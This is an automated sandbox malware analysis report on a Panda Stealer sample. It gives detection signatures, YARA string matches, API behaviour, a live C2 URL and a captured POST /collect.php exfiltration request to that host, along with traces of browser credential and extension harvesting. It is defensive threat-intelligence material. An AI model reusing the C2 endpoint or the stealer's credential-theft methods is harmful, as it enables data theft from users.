Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qRsw2oZH24.exe

Overview

General Information

Sample Name:qRsw2oZH24.exe
Analysis ID:740211
MD5:740554cb974f32f7542251b70cbafb6a
SHA1:15b5556c763412afbd882a2876fb85bad7a4d55c
SHA256:431fd6d04bb3e1c1dfb5ffc096246c3321fd467a110433640823f9ea5c90751d
Tags:CollectorStealerexe
Infos:

Detection

Panda Stealer
Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Yara detected Panda Stealer
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to read the PEB
PE / OLE file has an invalid certificate
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • qRsw2oZH24.exe (PID: 5708 cmdline: C:\Users\user\Desktop\qRsw2oZH24.exe MD5: 740554CB974F32F7542251B70CBAFB6A)
  • cleanup

Malware Configuration

Threatname: Panda Stealer

{"C2 url": "http://crimestreetsru.ru.xsph.ru", "Version": "1.11"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
qRsw2oZH24.exeJoeSecurity_PandaStealerYara detected Panda StealerJoe Security
    qRsw2oZH24.exeMALWARE_Win_AlfonosoDetects Alfonoso / Shurk / HunterStealer infostealerditekSHen
    • 0x96a6c:$s1: %s\etilqs_
    • 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s
    • 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s
    • 0x96b80:$s3: %s-mj%08X
    • 0x92e7c:$s8: recursive_directory_iterator
    • 0x92e9a:$s8: recursive_directory_iterator
    • 0x92eb8:$s8: recursive_directory_iterator
    • 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00
    • 0x96a84:$s11: :memory:
    • 0x92f28:$s12: current_path()
    • 0x96b6c:$s13: vtab:%p:%p
    qRsw2oZH24.exeMALWARE_Win_PandaStealerDetects Panda StealerditekSHen
    • 0x96228:$s2: user.config
    • 0x96a6c:$s4: %s\etilqs_
    • 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@
    • 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr
    • 0x96d8d:$s9: || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
    qRsw2oZH24.exeWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x9636c:$a1: ] - [user:
    • 0x96378:$a2: [-] data unpacked failed
    • 0x96350:$a3: [+] data unpacked
    • 0x96288:$a4: \history\
    • 0x963d0:$a5: PlayerName

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000000.305405629.0000000000897000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x1096c:$a1: ] - [user:
    • 0x10978:$a2: [-] data unpacked failed
    • 0x10950:$a3: [+] data unpacked
    • 0x10888:$a4: \history\
    • 0x109d0:$a5: PlayerName
    00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpWindows_Trojan_Pandastealer_8b333e76unknownunknown
    • 0x1096c:$a1: ] - [user:
    • 0x10978:$a2: [-] data unpacked failed
    • 0x10950:$a3: [+] data unpacked
    • 0x10888:$a4: \history\
    • 0x109d0:$a5: PlayerName
    Process Memory Space: qRsw2oZH24.exe PID: 5708JoeSecurity_PandaStealerYara detected Panda StealerJoe Security
      Process Memory Space: qRsw2oZH24.exe PID: 5708Windows_Trojan_Pandastealer_8b333e76unknownunknown
      • 0xfe4f:$a1: ] - [user:
      • 0xfeec:$a1: ] - [user:
      • 0x1ba92:$a1: ] - [user:
      • 0x1bb2f:$a1: ] - [user:
      • 0xfe5b:$a2: [-] data unpacked failed
      • 0xfef7:$a2: [-] data unpacked failed
      • 0x1ba9e:$a2: [-] data unpacked failed
      • 0x1bb3a:$a2: [-] data unpacked failed
      • 0xfe3d:$a3: [+] data unpacked
      • 0x1ba80:$a3: [+] data unpacked
      • 0xfab9:$a4: \history\
      • 0x1b6fc:$a4: \history\
      • 0xfe8b:$a5: PlayerName
      • 0x1bace:$a5: PlayerName

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      0.2.qRsw2oZH24.exe.810000.0.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
      • 0x97850:$s1: FZZ^\x14\x01\x01
      0.2.qRsw2oZH24.exe.810000.0.unpackJoeSecurity_PandaStealerYara detected Panda StealerJoe Security
        0.2.qRsw2oZH24.exe.810000.0.unpackMALWARE_Win_AlfonosoDetects Alfonoso / Shurk / HunterStealer infostealerditekSHen
        • 0x96a6c:$s1: %s\etilqs_
        • 0x96bcc:$s2: SELECT name, rootpage, sql FROM '%q'.%s
        • 0x97338:$s2: SELECT name, rootpage, sql FROM '%q'.%s
        • 0x96b80:$s3: %s-mj%08X
        • 0x92e7c:$s8: recursive_directory_iterator
        • 0x92e9a:$s8: recursive_directory_iterator
        • 0x92eb8:$s8: recursive_directory_iterator
        • 0x96194:$s9: 2E 7A 69 70 00 00 00 00 2E 7A 6F 6F 00 00 00 00 2E 61 72 63 00 00 00 00 2E 6C 7A 68 00 00 00 00 2E 61 72 6A 00 00 00 00 2E 67 7A 00 2E 74 67 7A 00 00 00 00
        • 0x96a84:$s11: :memory:
        • 0x92f28:$s12: current_path()
        • 0x96b6c:$s13: vtab:%p:%p
        0.2.qRsw2oZH24.exe.810000.0.unpackMALWARE_Win_PandaStealerDetects Panda StealerditekSHen
        • 0x96228:$s2: user.config
        • 0x96a6c:$s4: %s\etilqs_
        • 0xa18a0:$s7: .?AV?$_Ref_count_obj2@U_Recursive_dir_enum_impl@filesystem@std@@@
        • 0x96ea8:$s8: UPDATE %Q.%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr
        • 0x96d8d:$s9: || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (
        0.2.qRsw2oZH24.exe.810000.0.unpackWindows_Trojan_Pandastealer_8b333e76unknownunknown
        • 0x9636c:$a1: ] - [user:
        • 0x96378:$a2: [-] data unpacked failed
        • 0x96350:$a3: [+] data unpacked
        • 0x96288:$a4: \history\
        • 0x963d0:$a5: PlayerName
        Click to see the 5 entries

        Sigma Signatures

        No Sigma rule has matched

        Snort Signatures

        No Snort rule has matched

        Joe Sandbox Signatures

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Multi AV Scanner detection for submitted file
        Source: qRsw2oZH24.exeReversingLabs: Detection: 80%
        Antivirus / Scanner detection for submitted sample
        Source: qRsw2oZH24.exeAvira: detected
        Machine Learning detection for sample
        Source: qRsw2oZH24.exeJoe Sandbox ML: detected
        Source: 00000000.00000000.305405629.0000000000897000.00000002.00000001.01000000.00000003.sdmpMalware Configuration Extractor: Panda Stealer {"C2 url": "http://crimestreetsru.ru.xsph.ru", "Version": "1.11"}
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00822705 CryptUnprotectData,CryptUnprotectData,0_2_00822705
        Source: qRsw2oZH24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: qRsw2oZH24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008561B5 GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,0_2_008561B5
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00856107 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_00856107
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00856127 FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_00856127
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\Jump to behavior

        Networking

        barindex
        C2 URLs / IPs found in malware configuration
        Source: Malware configuration extractorURLs: http://crimestreetsru.ru.xsph.ru
        Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
        Source: Joe Sandbox ViewIP Address: 141.8.197.42 141.8.197.42
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Mon, 07 Nov 2022 18:25:56 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveVary: Accept-EncodingData Raw: 33 32 33 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 33 30 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 62 6f 64 79 2c 68 31 2c 70 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 7d 2a 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 7d 2e 77 72 61 70 70 65 72 2c 2e 77 72 61 70 70 65 72 20 2e 63 6f 6e 74 65 6e 74 7b 77 69 64 74 68 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 2d 77 65 62 6b 69 74 2d 62 6f 78 3b 64 69 73 70 6c Data Ascii: 323c<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title> 4030</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <style>body,h1,p{padding:0;margin:0}*{font-family:Arial,sans-serif;font-style:normal;font-weight:400}.wrapper,.wrapper .content{width:100%;display:-webkit-box;displ
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
        Source: OITRMEDRTX.SUDEKLVFW.0.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: unknownHTTP traffic detected: POST /collect.php HTTP/1.1Content-Type: multipart/form-data; boundary=SendFileZIPBoundaryUser-Agent: uploaderHost: crimestreetsru.ru.xsph.ruContent-Length: 826556Connection: Keep-AliveCache-Control: no-cache
        Source: unknownDNS traffic detected: queries for: crimestreetsru.ru.xsph.ru

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Yara detected Panda Stealer
        Source: Yara matchFile source: qRsw2oZH24.exe, type: SAMPLE
        Source: Yara matchFile source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: Process Memory Space: qRsw2oZH24.exe PID: 5708, type: MEMORYSTR

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: qRsw2oZH24.exe, type: SAMPLEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
        Source: qRsw2oZH24.exe, type: SAMPLEMatched rule: Detects Panda Stealer Author: ditekSHen
        Source: qRsw2oZH24.exe, type: SAMPLEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
        Source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
        Source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Detects Panda Stealer Author: ditekSHen
        Source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
        Source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Detects Alfonoso / Shurk / HunterStealer infostealer Author: ditekSHen
        Source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Detects Panda Stealer Author: ditekSHen
        Source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
        Source: 00000000.00000000.305405629.0000000000897000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
        Source: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
        Source: Process Memory Space: qRsw2oZH24.exe PID: 5708, type: MEMORYSTRMatched rule: Windows_Trojan_Pandastealer_8b333e76 Author: unknown
        Source: qRsw2oZH24.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: qRsw2oZH24.exe, type: SAMPLEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
        Source: qRsw2oZH24.exe, type: SAMPLEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
        Source: qRsw2oZH24.exe, type: SAMPLEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
        Source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
        Source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
        Source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
        Source: 0.2.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
        Source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, score = , reference = https://twitter.com/stvemillertime/status/1237035794973560834, modified = 2022-09-16
        Source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_Alfonoso snort2_sid = 920102, author = ditekSHen, description = Detects Alfonoso / Shurk / HunterStealer infostealer, clamav_sig = MALWARE.Win.Trojan.Alfonso, snort3_sid = 920100
        Source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_PandaStealer author = ditekSHen, description = Detects Panda Stealer
        Source: 0.0.qRsw2oZH24.exe.810000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
        Source: 00000000.00000000.305405629.0000000000897000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
        Source: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
        Source: Process Memory Space: qRsw2oZH24.exe PID: 5708, type: MEMORYSTRMatched rule: Windows_Trojan_Pandastealer_8b333e76 reference_sample = ec346bd56be375b695b4bc76720959fa07d1357ffc3783eb61de9b8d91b3d935, os = windows, severity = x86, creation_date = 2021-09-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pandastealer, fingerprint = 873af8643b7f08b159867c3556654a5719801aa82e1a1f6402029afad8c01487, id = 8b333e76-f723-4093-ad72-2f5d42aaa9c9, last_modified = 2022-01-13
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008230950_2_00823095
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008270090_2_00827009
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008291510_2_00829151
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008192940_2_00819294
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0081347A0_2_0081347A
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0081C9EC0_2_0081C9EC
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00817D350_2_00817D35
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00823E7B0_2_00823E7B
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008390820_2_00839082
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008861290_2_00886129
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008172BC0_2_008172BC
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008853C40_2_008853C4
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0088A3E30_2_0088A3E3
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0087A3400_2_0087A340
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0087836D0_2_0087836D
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008204AD0_2_008204AD
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008224310_2_00822431
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008185470_2_00818547
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0087C6F60_2_0087C6F6
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0081B6530_2_0081B653
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008517020_2_00851702
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008438180_2_00843818
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0088E93F0_2_0088E93F
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0087493E0_2_0087493E
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0088EA5F0_2_0088EA5F
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00821BD60_2_00821BD6
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: String function: 0086E620 appears 36 times
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: String function: 0086E2BF appears 58 times
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: String function: 00890CFC appears 62 times
        Source: qRsw2oZH24.exeStatic PE information: invalid certificate
        Source: qRsw2oZH24.exeReversingLabs: Detection: 80%
        Source: qRsw2oZH24.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile created: C:\Users\user\AppData\Local\Temp\BOFUPMJWUSFVSNIBDJEEJump to behavior
        Source: classification engineClassification label: mal84.troj.spyw.winEXE@1/3@1/1
        Source: qRsw2oZH24.exe, qRsw2oZH24.exe, 00000000.00000000.305405629.0000000000897000.00000002.00000001.01000000.00000003.sdmp, qRsw2oZH24.exe, 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
        Source: qRsw2oZH24.exe, 00000000.00000000.305405629.0000000000897000.00000002.00000001.01000000.00000003.sdmp, qRsw2oZH24.exe, 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
        Source: qRsw2oZH24.exe, qRsw2oZH24.exe, 00000000.00000000.305405629.0000000000897000.00000002.00000001.01000000.00000003.sdmp, qRsw2oZH24.exe, 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008339FA GetLastError,FormatMessageA,0_2_008339FA
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00826592 CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,OpenProcess,QueryFullProcessImageNameA,Process32Next,Process32Next,0_2_00826592
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0081433F LoadResource,LockResource,SizeofResource,0_2_0081433F
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: qRsw2oZH24.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
        Source: qRsw2oZH24.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0086E299 push ecx; ret 0_2_0086E2AC
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0081347A ___std_fs_get_current_path@8,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0081347A
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_0081347A ___std_fs_get_current_path@8,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0081347A
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008724FE VirtualQuery,GetSystemInfo,VirtualAlloc,VirtualProtect,0_2_008724FE
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_008561B5 GetFileAttributesExW,GetLastError,___std_fs_open_handle@16,GetLastError,GetFileInformationByHandle,FindFirstFileExW,FindClose,0_2_008561B5
        Source: C:\Users\user\Desktop\qRsw2oZH24.exeCode function: 0_2_00856107 FindClose,FindFirstFileExW,GetLastError,FindFirstFileExW,GetLastError,0_2_00856107
